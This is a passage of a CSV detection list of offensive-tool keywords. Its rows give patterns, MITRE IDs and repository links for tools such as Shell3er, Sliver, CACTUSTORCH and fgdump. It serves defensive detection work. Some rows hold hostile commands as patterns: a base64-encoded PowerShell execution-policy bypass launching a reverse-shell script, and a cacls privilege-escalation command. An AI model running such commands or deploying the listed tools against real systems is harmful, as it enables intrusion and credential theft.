"*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152*",".{0,1000}cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58*",".{0,1000}cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e*",".{0,1000}cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*cache_activedirectory.py*",".{0,1000}cache_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*cachedump.exe*",".{0,1000}cachedump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping 
passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cachedump64.exe*",".{0,1000}cachedump64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f*",".{0,1000}cacls\sC\:\\Windows\\System32\\wermgr\.exe\.local\s\/e\s\/g\severyone\:f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*CACTUSTORCH*",".{0,1000}CACTUSTORCH.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.cna*",".{0,1000}CACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.cs*",".{0,1000}CACTUSTORCH\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" 
"*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be*",".{0,1000}cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2*",".{0,1000}caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582*",".{0,1000}caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caffix*amass*",".{0,1000}caffix.{0,1000}amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*caffix/amass*",".{0,1000}caffix\/amass.{0,1000}","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. 
recursive brute forcing, crawling of web archives, name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*calc.zip /pass:xOVTzio*",".{0,1000}calc\.zip\s\/pass\:xOVTzio.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*calebstewart/bypass-clm*",".{0,1000}calebstewart\/bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*calebstewart/pwncat*",".{0,1000}calebstewart\/pwncat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-CalendarNTLMLeak*",".{0,1000}\-CalendarNTLMLeak.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*Call KaynLoader in a remote 
thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*CALLBACK_HASHDUMP*",".{0,1000}CALLBACK_HASHDUMP.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_KEYSTROKES*",".{0,1000}CALLBACK_KEYSTROKES.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_NETVIEW*",".{0,1000}CALLBACK_NETVIEW.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_PORTSCAN*",".{0,1000}CALLBACK_PORTSCAN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" 
"*CALLBACK_TOKEN_STOLEN*",".{0,1000}CALLBACK_TOKEN_STOLEN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 